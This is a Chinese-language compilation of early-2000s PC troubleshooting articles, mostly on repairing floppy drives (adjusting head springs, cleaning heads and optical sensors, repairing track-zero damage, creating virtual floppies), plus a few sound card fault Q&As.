    首先拆下软驱的前塑料面板，再打开上面的密封盖，拿一张软盘多次插入并取出，看一下磁头等机械部件活动是否灵活，有无迟钝或卡壳现象，经过多次试验并未发现异常现象，到底是什么原因导致软驱不能正常读写呢？记得资料上介绍过如果磁头偏移可以读写其自身格式化过的软盘，于是又打开机箱，将电源线和数据线分别插回已打开封盖的软驱上，开机并格式化一张空白软盘，只见磁头反复几个来回又出现错误提示框“软驱中没有软盘”，格式化都不能进行，看来不是简单的磁头偏移问题。关机并取下软驱，仔细观察了一下磁头的构造，发现磁头与磁盘的接触是靠磁头上的一个弹簧加压实现的，难道是接触压力太小造成不能读写软盘？拿镊子轻轻掀了一下磁头，感觉非常松动无力，又仔细观察加压弹簧，发现弹簧的一端有三个台阶，显然是用来调节弹簧压力的，现在弹簧正处在最下一个台阶，于是用镊子将弹簧移到最上面一个台阶。开机试验，读、写、格式化，所有软盘一切正常，问题得到解决。因磁头与磁盘接触压力太小不能正常读写的疑问得到证实。于是赶紧打开另一个软驱，按照同样的方法进行了调试，果然立刻见效。经过长时间试用，第一个软驱非常稳定可靠，第二个软驱偶然发生先前的症状。再次打开第二个软驱，拿下加压弹簧，发现该弹簧已发生塑性变形，弹力不足（注：该软驱是杂牌子），导致不够稳定。本人找了一个同样大小的弹簧稍作改进，按照原样重新制作了一个，经过试用效果非常好。如果手头没有同样的弹簧，也可将原来的弹簧向弹力方向相反的方向用力扭动，使其发生一定量的塑性变形，增加其弹力，效果也很好。
    由此可见，软驱不能正常读写或不识别软盘时，不一定有大的毛病，不要轻易丢弃，但也不一定是磁头偏移，也不要轻易调整磁头位置，以免越调越乱使软驱修复更加困难。我想常玩电脑的人身边肯定有几个这样的软驱，不妨照此法一试。


软驱常见故障维修两例

《一键清理系统垃圾》

软驱常见故障维修两例

    软盘驱动器故障是计算机常见故障中的一类。

    故障现象一：访问A盘时，第一张盘的内容显示正常，可以执行或打开文件，若连续列读第二张不同内容的软盘后，还是显示第一张软盘的目录内容，第二张软盘的文件不能执行或打开。

    故障分析及处理：从故障现象来看，第一张盘的文件可以执行或打开，说明驱动器没有电路上的损坏，但换盘后却不能识别，主要原因可能是A驱动器的检测装置失灵，在第一次读盘后，再读其它盘时，内存得不到刷新。

    打开主机箱，将软驱卸下，用万用表检测发光二极管及光敏二极管均正常，仔细检查，发现机内灰尘较多，弹盘导杆复位不好，驱动器磁头固定机构很脏，磁盘导轨、导杆移动困难，并且有一磁盘写保护标签脱落在零磁道检测光电传感器处。将脱落的磁盘写保护标签取出，把机内的灰尘清理干净。用无水酒精将磁盘导杆、导轨及磁头小车导杆上的污物清洗干净，滴上少许润滑油，然后将小车及磁盘导杆来回滑动几下，使其润滑均匀，故障排除。

故障现象二：系统在读A盘时，错误时常发生，屏幕显示：
A盘在读写时，系统提示无法读取指定的设备，或者提示A盘未格式化。
    若是在DOS下读取，则提示：
    General failure reading drive A

    Abort,Retry,Fail?

并且软驱发出“吱吱”的噪音。

    故障分析及处理：由软驱发出的噪音来看，初步判断很可能是软驱的机械部分有故障。将软驱背盖打开，发现微机启动后，主轴马达运转正常，当用手指压压紧轮上的圆头后，微机就能恢复正常的读写工作，这说明软驱的机械部分有故障。一般来说，软驱由主轴马达启动并运转，然后由磁头小车带动磁头进行读写。如果主轴马达对磁盘的压力不够，会使压紧轮不能压紧磁盘，磁盘与主轴表面产生相对滑动，而发出“吱吱”的响声，从而使磁头定位不准。再仔细观察，发现压紧轮上的弹簧已变形，造成了主轴马达对磁头压力不够，致使磁头定位不良。将弹簧的一垫圈重新调整好后，再添加一垫圈，加大压力，故障排除。

此外，软驱磁头脏也会导致读盘或格盘失败，只要将磁头清洁一下就OK了。

    软盘驱动器的维修在一定程度上并不复杂，完全可以自己动手解决，对于插件松动、活动磁头移位、弹簧变形、沾染灰尘等非元件损坏的故障，可试着用清洗、纠正、重整的办法来排除。


软驱的日常维护

《一键清理系统垃圾》

软驱的日常维护

在电脑系统里，恐怕只有软盘驱动器是升级最慢的了。1.44MB的软驱，不管是几年以前，还是如今，只要是装机，它都是必需品。当然，现在还有ZIP等大容量软驱，但由于价格等原因，它的普及率远远不及1.44MB软驱。另外，别看软驱个小，对于文件资料传递和重要信息机外备份来说，它可是功不可没。正因为软驱有如此高的普及率和重要性，所以对软驱的日常维护十分重要。下面，我就给大家讲讲软驱的日常维护与保养。
    软盘驱动器与硬盘驱动器不同，它的机械系统并未密封，如果使用与维护不当，很容易出现故障，造成软盘数据的丢失。因此，为了延长软驱的使用寿命，保证软盘数据存取正确、可靠，在软驱的日常使用与维护时，应注意以下几点：
    1.购买软盘时，一定要购买质量好的名牌产品。质量不好的软盘放到软驱中进行读写，很可能将软驱的磁头弄脏或使磁头发生偏位。其次，质量不好的软盘存储数据也是不可靠的，经常发生不能正常读写等问题。
    2.不要使用有物理损伤、受潮、磁层脱落的软盘，以免损坏软驱磁头。
    3.软盘不使用时，应从软驱中取出存放好，不要将软盘长时间放在软驱中。
    4.软驱读取数据时（软驱工作指示灯亮），不要强行取出软盘，以免损坏软驱磁头和软盘。
    5.软驱不能正确读取数据或出现划盘故障时，不应继续使用，以免使故障扩大或损坏其它软盘。
    6.定期（如一个季度或半年）对软驱的机械部分及检测元件进行除尘。可用无水酒精擦洗磁头小车、钢带、导轨、发光二极管和光敏三极管。当磁头小车、钢带或导轨上有灰尘时，这些灰尘粘附在小车和钢带之间，就会导致磁头定位不准而出现读写错误。
    7.软驱使用一段时间后，由于软盘上的磁层脱落或灰尘的堆积，将降低磁头的读、写灵敏度，因此，必须定期清洗磁头（一般以半个月清洗一次为宜）。
    清洗原则是：一般情况下，使用干清洗盘，如清洗后无效，可用湿清洗盘（滴入清洗盘读写口的清洗液不宜太多，否则会划烂清洗盘和损伤磁头）。利用HD－COPY软件中的Specialmenu中的Use cleaning disk（使用清洗盘）功能，可让软驱磁头从0磁道到最高磁道来回走动，同时驱动马达旋转带动清洗盘转动，达到清洗磁头的目的，该功能使驱动器自动旋转15秒钟。该方法清洗磁头比较彻底。如果磁头太脏，则要采用手工清洗，即用棉球蘸清洗液或无水酒精，轻轻擦洗软驱的上、下磁头。需要注意的是，擦洗时不能用力过猛，以免使磁头移位。但是，有时灰尘堆积时间太长，会在磁头上产生重度污染，而利用浸泡法去掉磁头上的重度污染物，具有较好的实用性。具体步骤如下:
    （1）取下软驱，露出软驱的磁头小车；
    （2）用小螺丝刀（有条件的最好用注射器）将无水酒精滴在软驱磁头上，使磁头被酒精浸泡住；
    （3）浸泡约2分钟～3分钟后，观察酒精是否已干，在冷天及潮湿天气时最好用电吹风吹吹磁头部位；
    （4）装回软驱、插上电源线及信号线；
    （5）在清洗盘的磁头工作处滴上几滴清洗液，将其插入软驱，主机上电工作，利用常规手段，将磁头摩擦清洗2次～3次。

作者：寂寞高手


软驱读写控制开关维修记

《一键清理系统垃圾》

软驱读写控制开关维修记

    近来3.5英寸软驱读盘时总是不听话，非得用手将软盘卡住方可工作。本以为是磁头脏了不能准确读取信息，但用清洁剂清洗后仍无济于事。一次偶尔的机会发现，软驱可以读取信息，但不能向软盘上写入信息，我以为设有写保护。取出软盘一看，并没有设写保护。这时，我才意识到可能是软驱上的读写控制开关有问题。于是，我打开机箱，取出软驱，用小刀拨开软驱上的护盖。在软驱上的两侧分别有两个白色的开关按钮，它们中的一个是读写控制开关，另一个是高低密度控制开关。我推测产生故障的原因就在这里，因按钮的小槽内比较脏，开关电路接触不良，以至于读写控制开关失灵。如有新开关直接换上便可搞定。即使没有也不要紧，可以采取如下的应急措施：找少许纯净的酒精和一些棉花，另加一根牙签。将棉花裹在牙签上，蘸取适量的酒精，分别清洗软驱两侧的按钮，清洗时让棉球紧靠按钮柱面，挤压棉球让尽可能多的酒精沿圆柱面流到小槽里面去。洗完以后，用小刀分别按压几下两侧的按钮，让小槽内的灰尘随酒精一起被挤压出来。像这样重复上述操作几次，便可将槽内的灰尘洗净。盖上护盖，将软驱拿到机器上去一试，读写正常，一切OK！上述清洗方法也可作如下改进；可用较细的注射器吸取纯净的酒精冲洗按钮，边冲洗边按压按钮。


软驱故障排除三例

《一键清理系统垃圾》

软驱故障排除三例

    故障一例
        故障现象：在软盘驱动器中插入软盘时，读、写操作正常，但如果插入另外的一张软盘，则无法进行读、写。即使用DIR命令查看软盘文件，屏幕上仍显示前一张软盘的内容，而对新插入的软盘根本不认识。如果抽出该盘，即软盘驱动器内没有任何软盘，然后对该驱动器执行任意一条命令（如DIR），再次插入软盘，才能对该盘进行正常操作。
        故障分析及排除方法：从故障现象看，该驱动器在不换软盘时的操作一切正常，说明驱动器中有关选盘、零道、步进、方向、索引、寻道、读/写均正常；而在换软盘后就出现上述故障，故应重点考虑软盘换盘机构或换盘信号（DISKCHANGE）是否有问题。正常情况下，当新换软盘插入到检盘器光电耦合管的中间位置时，检盘器将产生更换软盘的信号，然后，此信号将被送给磁盘驱动器的控制器进行分析处理，从而完成更换软盘的工作。根据上述分析，可以判断：当软盘达不到正常位置时，检盘器使控制器发出了错误的换盘信号，软盘缓冲器刷新信号没有被送出，软驱不能做好读、写准备，从而产生上述故障。于是打开机箱，拆下软盘驱动器，仔细检查内部结构。结果发现：推动软盘的弹簧已经变了形。用一根新的小弹簧更换后，故障被排除。
    故障二例
        故障现象：将一张正常的软盘插入软驱后，在进行读、写操作时，屏幕出现以下错误提示信息：
        Sector not found error reading　drive　A　Abort，Retry，Fail？
        故障分析及排除方法：根据以上故障现象，判断故障原因在于软盘驱动器本身。于是打开机箱，检查软盘驱动器读磁盘的操作过程。结果发现：磁头小车移动不正常。通常情况下，磁头小车的前后移动是靠步进电机带动钢带进行的，而磁头小车则沿着一条光滑的钢导轨来回滑动。由于长期没有对驱动器进行磁盘操作，导致钢带、导轨因积尘而使得磁头小车在来回移动的过程中受到的摩擦阻力增大，从而形成了上述故障。为了排除该故障，先关掉电源并卸下该驱动器，然后用脱脂棉球蘸上少量无水酒精清除钢带、导轨上的灰尘。重新装好驱动器，启动微机，该驱动器的读、写操作恢复了正常。
    故障三例
        故障现象：在对软盘驱动器中的软盘进行操作时，可以正常地读取文件，但却不能将别的文件拷贝到该盘上，也无法删除该盘上的文件和对该盘进行格式化操作，并出现下述写保护错误信息：
        Write protect error writing drive A
        Abort，Retry，Fail？
        但该软盘并没有处于写保护状态。更换软盘，反复试机，故障现象依旧。
        故障分析及排除方法：在软盘驱动器中，有些信号是通过光电耦合原理产生的，如写保护信号、索引信号、准备好信号。这些信号一般都是采用发光二极管和光敏三极管来实现发送和接收的。如果发光二极管发出的光线能有效地照射到光敏三极管上，则光敏三极管导通；反之，光敏三极管就截止。在格式化中，需要索引孔作为位置参照，用以标志信息是在第一个脉冲来了之后才被写到软盘上的。由于无索引信号送到软盘控制器中，导致软盘控制器无法确定写入信息的起始位置而不能进行格式化工作。由于发光二极管和光敏三极管损坏的可能性不大，一般是发光二极管和光敏三极管被灰尘覆盖所致。于是打开机盖并卸下驱动器，在取下驱动器前左侧的电路板后发现读写孔内灰尘较多，此时使用脱脂棉球蘸上少量无水酒精进行擦拭，然后装好驱动器及机箱，重新启动微机并对该盘驱动器内的软盘进行操作，结果再也没有发生类似的故障了。


软驱故障维护大全

《一键清理系统垃圾》

软驱故障维护大全

    软驱历史可谓源远流长，在早期的286、386机器中我们就以5英寸的软驱进行文件资料传递、重要信息备份。现代，软驱已演进到3.5英寸，虽然它的作用已不及原先那么重要，但是在某些特定的场合软驱的功用仍不可替代。软驱在使用一段时间后，可能会突然出现一些故障，让人不知所措。此时，劝诸友最好是沉着应战。我将带领大家以最快的速度排除故障。
    1、灰尘引起的软驱故障
     在软盘驱动器中，有些信号是通过光电耦合原理产生的，如写保护信号、索引信号、Ready信号。这些信号一般都是采用发光二极管和光敏三极管来传达。如果发光二极管发出的光能有效地照到光敏三极管上，则光敏三极管导通。反之，则截止。在实际工作中，随着使用时间增长在发光二极管和光敏三极管上堆积了灰尘，使得光敏三极管不能正常地导通和截止。
    灰尘积聚常常是产生故障的主要原因。常见的故障现象有:
    ①能读写但不能格式化。原因:没有索引信号。因为在格式化中需要索引孔作位置参照，标志信息在第一个脉冲来了之后才写到盘上。由于无索引信号送到软盘控制器中，导致控制器无法确定写入信号的起始位置而不能进行格式化。由于发光二极管和光敏三极管损坏的可能性不大，一般是发光二极管和光敏三极管上灰尘堆积所致。
    ②“写保护”错误。对没有“写保护”的完好软盘进行写操作或格式化时，计算机提示“Write Protect Error”。这种情况一般也是由于发光二极管和光敏三极管表面被灰尘覆盖，使光敏三极管不能接收到发光二极管发出的光，其效果相当于软盘的写保护口被封，二极管发出的光被截止，从而作出了盘被“写保护”的判断。
    ③“没有准备好”错误。对软盘进行操作时有时提示“Not Ready Error”。原因:当软驱主轴电机转动之后，检测有无索引脉冲以及信号是否正确，如果没有索引脉冲或信号不正确。则会出现以上错误。这种问题一般出现在检测索引的发光二极管和光敏三极管上，这两个元件上灰尘过多，造成索引脉冲被灰尘隔断，检测电路无法检测到两个连续索引脉冲，从而导致“没有准备好”的错误。
    ④“目录滞留”现象。开机后，第一张软盘能正常操作，但换盘后，运行盘上存在的文件时提示“Bad Command or Filename”或列文件目录时显示的仍是第一张盘上的内容，我们把这种现象称为“目录滞留”，这也是发光二极管和光敏三极管表面被灰尘覆盖所致。
    以上的软驱故障，只须用软驱清洁盘清洁发光二极管和光敏三极管即可排除。清洁后如果问题依旧，可打开软驱用棉球蘸无水酒精擦洗干净。
    2、机械性故障
    电脑常出现的软驱、光驱问题，其实在很多的情况下主要是机械性故障，一般都可以修复。光驱和软驱机械性故障常出现在光头组件、磁头组件等机械部位。只要我们细心观察就能发现问题，及时修好。
    故障现象:在Win98的资源管理器中双击驱动器A(软驱中已插入了磁盘)，软驱指示灯亮，接着屏幕上出现“磁盘未格式化”。另换一张已格式化并且已有文件的完好磁盘，读盘同样出现“磁盘未格式化”的字样。从显示的“未格式化”的指令来判断，引起此故障的原因是软驱的磁头组件不能运动或磁盘不转动。
    修理方法:先关闭计算机，用螺丝刀拧下固定软驱的螺钉，将软驱取出(不必拔掉电源线和数据线，否则在观察软驱工作状况时，又必须插上)，取下软驱的外壳，就可以看到软驱的磁头运动组件了。这时可以打开计算机的电源，启动计算机，看计算机在启动的过程中软驱的磁头组件是否运动。经观察发现:启动时软驱的磁头组件不动，这时在软驱中插入一张磁盘，读盘一试，结果磁盘旋转，磁头组件还是不动，屏幕上继续出现“磁盘未格式化”字样。软驱磁头组件不运动的原因有两个:一是驱动磁头组件的电机损坏;一是没有使电机旋转的正负电压。再次启动计算机，在计算机读软驱时，用MF47型万用表直流1伏档，测得软驱的1、4针脚处约有正负电压约0.1伏。再关闭计算机电源，拔掉软驱上的电源线和数据线，测驱动电机电路的四个焊接点的内阻，若有电阻则可知软驱的驱动电路、电机不存在问题。那么，看来电机不转动的原因是电机的螺杆轴卡死，因电机马力较小，阻力略大，螺杆轴就会转不动。问题找到，修复就容易了。在电机的螺杆轴上滴少许机油，用一把摄子夹住螺杆轴，用力向右旋转，磁头组件开始向中心移动，反复移动几次，感到转动较灵活了，就可开启计算机试软驱了。这时看软驱的磁头组件在软驱指示灯亮时是否运动，结果能运动了，然后在软驱中插入磁盘，磁头能读到磁盘的数据，再拷贝一个文件到磁盘。OK，一切正常。
    3、软盘零磁道损坏
    软驱不能读盘，也部分原因可能是软盘的零磁道损坏。当软盘插进软驱，在“我的电脑”下打开A盘时，光标在屏幕上颤动一会即显示:“无法访问A:\。系统无法读取指定的设备”。软盘零磁道损坏，可用以下几种方法修复:
    1.首先在Win98桌面上双击“我的电脑”，打开后在软驱图标下点击右键，选择“属性”，点击“工具”，选择“查错检查”。如果经检查后显示“严重损坏……”，就应该放弃修复。
    2.试用PCTOOLS 9.0修复。打开DISK菜单，选取“Format”项，将坏磁盘插入A驱，再在屏幕上选取“A:1.4M”→“OK”，出现配置菜单，选择“Safe Format”选项，然后根据原磁盘容量选择合适的磁盘空间。格式化完成后，用“Unformat”命令将软盘中原来的内容恢复。
    3.利用Norton中的Disktools修复。在DOS下启动Disktools后，出现一个主菜单，菜单第三项是“Revive a Defective Disk”(救活一个有缺陷的磁盘)，然后出现一个对话窗口，选择坏盘所在驱动器和磁盘类型，然后回车即可修复。
    4.应用HD-COPY修复。HD-COPY可在软盘上每磁道不超过一个坏块时，另取一个好块替补，将此坏块从FAT表中剔除并完成格式化的功能。因此，可利用此功能进行修复，具体方法如下:
    进入 HD-COPY，选Options menu。设好源盘和目标盘(此处均设为1.4MB)，然后将Options-4菜单设置如下:
    选Format destination，在Format菜单中根据需要选择不同磁盘规格作格式化。先选80×18即标准1.44MB格式，失败，提示 Bad CRC Error……。再选82×18，1.476MB格式时格式化成功，系统提示在FAT区发现一个坏块并用另一个好块替补，然后顺利完成格式化。
    格式化完成后，用DOS 5.0以上的Scandisk作磁盘检查，并要注意作Surface Scan(磁盘表面检查)。然后反复拷贝，证明格式化完全成功。


软驱惊魂记

《一键清理系统垃圾》

软驱惊魂记

    前段时间拆机为爱机做了一次清洁，可重新装配好后我却发现软驱竟然“罢工”了——每次读盘都说“磁盘未被格式化”，用清洁盘清洁磁头后依然如故。我反复检查了软驱的连接和设置，甚至把软驱线都换了，都没有解决问题，看来软驱真的“牺牲”了？我找了一只新的软驱照原样上好，竟然还是一样毫无动静。后来的拆装中我却偶然发现了一个奇怪的现象：在机箱里不行的软驱，在被拿出机箱后却能读盘了！这证明软驱是好的，但为什么在机箱里就用不了呢？

    我把软驱重新装回机箱里，希望能找到原因。这时软驱奇怪的读盘声提醒了我：软驱正常读盘时发出的是锯木头似的声音，可现在却好像在吹风——是盘片不到位，悬空读盘时的声音！我仔细地检查了机箱，终于找到了罪魁祸首——机箱面板上的软驱退出键！这个机箱没有直接露出软驱，而是为了美观用面板将其挡住，再通过一个退出键推动软驱的退盘键弹出软盘。这种设计本来很好，但是这个无名机箱做工粗糙，加工精度不高，退出键竟然比标准的长了３毫米，造成软驱在按正常位置安装时退盘键被挤压，使进入软驱的软盘处在一种“半进不退”的状态，导致了读盘的失败。至于原来能够读盘，是因为电脑公司的人在帮我装电脑的时候人为地将软驱后退了３毫米，却没有告诉我这个问题。找到了根源，事情就好办了。我把上螺丝的位置向后退了３毫米，软驱又开始了欢快的工作。

    从这一次问题解决过程中，我得到了这样一个启示：机箱虽非“高科技”，选购仍需要注意，一个好机箱会为我们减少很多不必要的麻烦。


修复“可读不可写”的软驱

《一键清理系统垃圾》

修复“可读不可写”的软驱

     我那块古老的“米苏米”软驱已随了我好几载风雨，岁月无情，终于在某一天上午，当我正想将写好的论文存入软盘时，随着“叮”的一声，WIN98给我来了个错误信息：软盘写保护。我推出盘片一看，写保护已经打开了呀！复又将盘插了回去，但依旧可读不可写。会不会盘有问题！但盘有问题时只会出现“磁盘写错误”或“磁盘未格式化”等信息呀。虽然是这样想着，但我还是换了张新盘，这次却写进去了。
    本来此事我也没怎么在意，但几天后，问题越来越严重了：运气好时，重复插几次盘就能读出，但能读不能写；运气不好时，换什么盘都不行。我一气之下，把软驱来了个开膛，用毛笔刷去灰尘，拿拭镜纸擦了磁头，来了个大扫除，但这家伙仍不领情。我仔细观察了一下，发现磁头寻道正常（磁头能自动退回读磁片外圈），而且没有抖动现象，说明零磁道定位无误，步进电机及磁头正常。联想到上次的“写保护”问题，我试着将已插入软驱的磁盘靠左边（也就是写保护）的那一角往上顶住，没想到这次居然读了出来。多试几张发现只要有问题时，将一片厚一点的卡片插入软驱与磁盘之间的缝里，把盘往上顶一点，都可以搞定。
    正暗自庆幸着解决了一个毛病，但想到打开写保护时，那个小塑料片是将软驱里对应的一个活动小棍顶了下去；而写保护时，小棍自动弹上来，从而达到写保护目的。而我是将磁盘往上顶，也就是让小棍往上弹，这岂不是更容易写保护吗？想不通。因为已经可以写盘，我懒得去管它是不是瞎蒙误撞，暂时作罢。
    没想到这次手术没撑好久，这块高龄软驱再度罢工，无论我将卡片怎么插，都无济于事，最后读都读不出。只好再修它一把。开机箱，拧螺丝，拆线，打开软驱盖，这儿擦擦，那儿碰碰。当我的手按上磁头时，情况有了变化：以前软驱灯亮一会儿就灭了，接着报错，但这次只要手不松，那灯就长亮不止，哈哈，原来磁头松了，好说好说。我小心地将压磁头的那个弹簧抠下，将它往反方向用力拧了一圈重新装回去时，感觉弹性强多了。接上线，插入盘，读起来如行云流水，一点儿磕磕碰碰都没有。这时想起来可能是磁盘在写操作时条件比读操作的要更严格，当上面弹簧压力不够时就会出问题。上次插入了一块卡片，实际上就是将盘片往上撬高了一点，使位于上方的磁头与盘片贴紧了一些，但久而久之，加速了弹簧的老化，下面的磁头离盘片也越来越开，迟早都会出毛病。这其实与写保护扯不上关系，而之所以“写保护”，是因为电脑能读出来，但写不进去，按程序只好给判个“写保护”了，真是张冠李戴。


修复罢工的软驱

《一键清理系统垃圾》

修复罢工的软驱

《中国电脑教育报》星云

    一日，爱机的软驱出现了问题，症状是不能读写，总是提示软驱中没有软盘，偶尔能够读写但中途就会出错，并出现蓝屏现象。首先把各接线重新安装了一遍，又清除了主板及软驱上吸附的灰尘，开机再试，问题依旧。突然想起以前看过的一篇文章中曾经介绍过软驱磁头偏移可能导致类似问题，于是决定把软驱拆开看个究竟。

    首先拆下软驱的前面板，再打开上面的密封盖，拿一张软盘多次插入并取出，看一下磁头等机械部件活动是否灵活，有无迟钝或卡壳现象，经过多次试验并未发现异常，到底是什么原因导致软驱不能正常读写呢？记得那篇文章曾介绍说：“如果磁头发生偏移，那么软驱只能够读写其自身格式化过的软盘”。赶紧找出一张软盘进行格式化，经过短暂的等待，又出现了“软驱中没有软盘”的提示信息，格式化都不能进行，看来不是简单的磁头偏移问题。关机并取下软驱，仔细观察了一下磁头的构造，发现磁头与磁盘的接触是靠磁头上的一个弹簧加压实现的，难道是接触压力太小造成不能读写的？拿镊子轻轻掀了一下磁头，感觉非常松动无力，又仔细观察加压弹簧，发现弹簧的一端有三个台阶，显然是用来调节弹簧压力的，现在弹簧正处在最下面一个台阶，于是用镊子将弹簧移到最上面的一个台阶。插上数据线和电源线，开机再试，读、写、格式化，所有工作一切正常，问题得到解决。

    由此可见，软驱不能正常读写或不识别软盘时，不一定有大的毛病。磁头偏移现象并不是经常发生，所以不要轻易调整磁头位置，以免越调越乱使软驱修复更加困难。


虚拟软驱

《一键清理系统垃圾》

返回总目录 上一页 目录页

虚拟软驱

  1.subst.exe焕发青春
    subst.exe是一个不太常用的DOS命令，它的位置隐藏在\Windows\Command\下(针对Windows 9X/Me系统)，如果是Windows 2000/XP，则应该隐藏在\Windows\System32\下，前者的大小为17.6KB，后者的大小更小一些，才9.0KB而已。

    subst.exe的完整名称是“给目录赋驱动器符命令”，它的功能是以磁盘驱动器号代替路径名称，以使驱动器号与指定的子目录路径关联，其命令格式很简单：

    subst.exe [Driver1: [Driver2:] Path]

    其中的“Driver1”是指定指派路径的虚拟驱动器盘符，“Driver2 Path”则是指定物理驱动器和要指派给虚拟驱动器的路径。

    2.利用subst.exe虚拟软驱
    例如，在安装瑞星杀毒软件前，你可以先通过其他方式(例如局域网、邮件、共享文件)将A盘的所有文件复制到本机的一个文件夹中，例如D:\temp下。然后在命令提示符窗口下键入如下命令“subst A: D:\temp”，如图1所示，朋友们可以看一看这里用“dir A:”命令后的文件列表，就知道一张软盘中是绝不可能放入如此之多的东东的。这样，我们就可以按照这种方法将D:\temp文件夹虚拟成A盘，瑞星杀毒软件的安装就可以顺利完成了。

    当我们虚拟软驱后，你会发觉软驱的图标已经变成了图2所示的硬盘图标，当然双击打开后就是D:\Temp文件夹中的内容。

    3.删除虚拟软驱
    如果你要删除这个虚拟出来的A盘，只要执行“subst A:/D”命令就行了，切记工作结束后一定要及时删除这个虚拟出来的A盘，否则无法正常使用原来的物理A盘哟。

    有些软件只能在软盘上运行，这是软件开发者的特别设计，主要目的是为了防止非法拷贝。不过，我们可以先通过HD-COPY工具将软盘做成一个扩展名为img的镜像文件存放在硬盘上的某个文件夹中，然后利用IMGDRIVE、UNDISK等工具软件将该镜像文件展开，这样就可以在硬盘上创建一个虚拟软盘，自然也就可以正常运行了，不过如果是加密的软件，则无法通过这种方法正常运行。


软驱故障

《一键清理系统垃圾》

返回总目录

软驱故障

◎调整软驱磁头偏位
◎加快软驱传输速度
◎揭开软驱不能读盘之谜
◎解决不定时搜寻软驱问题
◎解决自动搜索软驱
◎禁止Win2000启动时读软驱
◎清洁软驱磁头的三种方法
◎让旧软驱起死回生
◎软驱常见故障维修两例
◎软驱的日常维护
◎软驱读写控制开关维修记
◎软驱故障排除三例
◎软驱故障维护大全
◎软驱故障与刷新BIOS
◎软驱惊魂记
◎无软驱电脑启动故障一例
◎修复“可读不可写”的软驱
◎修复罢工的软驱
◎虚拟软驱

www.163164.com 下载:《一键清理系统垃圾》程序，保持系统的“苗条”身材与运行速度！

返回总目录


SOUNDMAN导致无法录音

《一键清理系统垃圾》

返回总目录 目录页 下一页

SOUNDMAN导致无法录音

《中国电脑教育报》许向前

    把声音从磁带录到电脑中来，相信这并不是什么难事，可是我就遇到了一次离奇的“软故障”，这声音说什么也录不进去……

    前些天MM要我帮忙录一段音乐。这还不简单，找个录音软件录一下就是了（我用的是Audio Edit），很熟练地把线接好了。按下放音键，开始，咦，怎么看不到录音的波形？该不会是把线接错了吧（这可是低级错误呀）？检查了一下，不是。会不会是录音控制里没有把“线路输入”勾选呢？打开音量控制，也没问题。再打开音频属性，设备也没问题。再来一遍，还是不行。怕是中病毒了？杀了一下毒，未发现任何病毒。该不会是声卡驱动有问题了吧？于是在设备管理器中把声卡删除，重新把声卡驱动程序安装了一遍，还是不行。一时间我没头绪了（不至于要把系统重装吧），看着MM信赖的目光，我的脸竟然还没红（我真佩服我自己）。

    会不会是电脑启动的时候加载的程序太多了呢？我下意识地看了一下任务栏，乖乖，除了输入法、小喇叭外，还有四五个图标呆在那里。把它们统统关掉。再试，一切OK，MM当然是一脸敬佩的神情。

    到底是什么原因呢？后来经过一番研究，发现是随系统启动的一个程序惹的祸。我现在用的这台电脑声卡配的是AC'97软声卡，安装声卡驱动的时候，同时安装了一个叫SOUNDMAN的程序，结果有关声音的一些配置就被它接管了去，导致不能正常录音，把它关掉就一切正常了。想想一定也有许多同行电脑中用的也是AC'97软声卡，说不定也会遇到这种现象，写下来，说不定会帮上一个小忙。


常见声卡故障问答集锦（二）

《一键清理系统垃圾》

常见声卡故障问答集锦（二）

《中国电脑教育报》王磊

    在本报2003年第2期A16版的《常见声卡故障问答集锦（一）》一文中，我们针对“声卡无声”和“操作系统无法识别声卡”两个问题做了一番比较详细的解答，相信大家一定受益匪浅。本期我们将对其他一些比较常见的声卡故障作一分析，希望同样能对大家有所帮助。

    问题一 播放音乐CD无声？

    答：此问题可以从两方面来考虑。

    图1 检查声卡驱动是否为WDM

    一、完全无声。比如用Windows 98的“CD播放器”播放音乐CD时无声，但“CD播放器”工作正常。遇到此类问题时，首先应该检查是否采用了WDM版的声卡驱动，方法是：用鼠标右键单击“我的电脑”，然后依次选择“属性→设备管理器→声音、视频和游戏控制器”，在出现的内容列表中查找“WDM”字样（如图1），没有的话，请到驱动之家（www.mydrivers.com）或声卡厂商主页去下载WDM版的驱动，这样应该可以解决问题。如果声卡厂商没有提供WDM版的驱动，那么请替换或重新安装声卡与光驱之间的音频线。

    图2 查看声道均衡状况

    二、只有一个声道出声。请检查声道的均衡状况，方法是：依次选择“开始→程序→附件→娱乐→音量控制”，在出现的菜单中查看“Master”和“CD Player”中控制声道音量的滑动杆是否处于两声道的正中央（如图2 ）。如果此处不存在问题，则可能是声卡驱动遭到了破坏，重新安装即可。

    问题二 无法播放WAV、MIDI音频文件？

    图3 选定一个音频设备来播放wav音乐

    答：不能播放WAV音频文件往往是因为“控制面板→多媒体→设备”下的音频设备不止一个，这时禁用一个即可（如图3）；不能播放MIDI音频文件则是16位模式与32位模式不兼容的问题，通过安装软件波表的方式即可解决。

    问题三 声卡发出的噪音过大？

    答：引起此问题的可能性很多，主要可以归结于以下几个方面。

    一、声卡自身抗干扰能力差。某些杂牌声卡由于做工及用料比较差，所以容易受到其他设备电磁干扰的影响。这属于声卡先天上的不足，所以普通用户能做的就是让声卡尽量远离其他设备。

    二、声卡没有安装好。由于某些机箱制造精度不够高，导致声卡不能与主板扩展槽紧密结合。通过目视可见声卡上的“金手指”与扩展槽簧片不能充分接触。这种现象在ISA或PCI声卡上都有，属于常见故障，一般通过调整声卡挡板的位置即可解决问题。

    三、驱动程序问题。请尽量选用声卡厂商根据不同操作系统所推出的专用驱动，第三方的驱动程序和Windows默认的驱动往往会在某些方面存在一些问题。

    问题四 无法正常录音？

    答：双击任务栏中的小喇叭图标，进入Volume Control窗口，选择“选项→属性”，单选“录音”项，看看各项设置是否正确。接下来依次选择“控制面板→多媒体→设备”，分别将“混合器设备”和“线路输入设备”设为“使用”状态（如图4）。如果“多媒体→音频”中的“录音”选项是灰色的话，请下载并安装新版本的声卡驱动，这样应该可以解决问题。

    图4 将“混合器设备”设为使用状态

    至此，本系列的文章将要和大家说一声再见了，如果大家还有什么问题或不同的见解，欢迎来信（hard@cce.com.cn）与我们交流。（全文完）


常见声卡故障问答集锦（一）

《一键清理系统垃圾》

常见声卡故障问答集锦（一）

《中国电脑教育报》王磊

    在日常使用计算机的过程中，声卡工作不正常是最常见、也是我们最为头疼的一类问题。下面根据本人及众多朋友的经验对声卡的常见问题及解决方法作一汇总，希望能对大家有所帮助。

    问题一 声卡无声怎么办？

    答：此问题可以通过以下四个方面来解决。

    1、安装声卡驱动

    在进行操作之前，首先要准备好声卡驱动程序盘和操作系统（这里我们以Windows 98为例）的安装光盘，然后按以下步骤进行操作：

    第一步，用鼠标右键单击“我的电脑”，选择“属性”命令，再单击“设备管理器”选项卡，选择“按类型查看设备”。

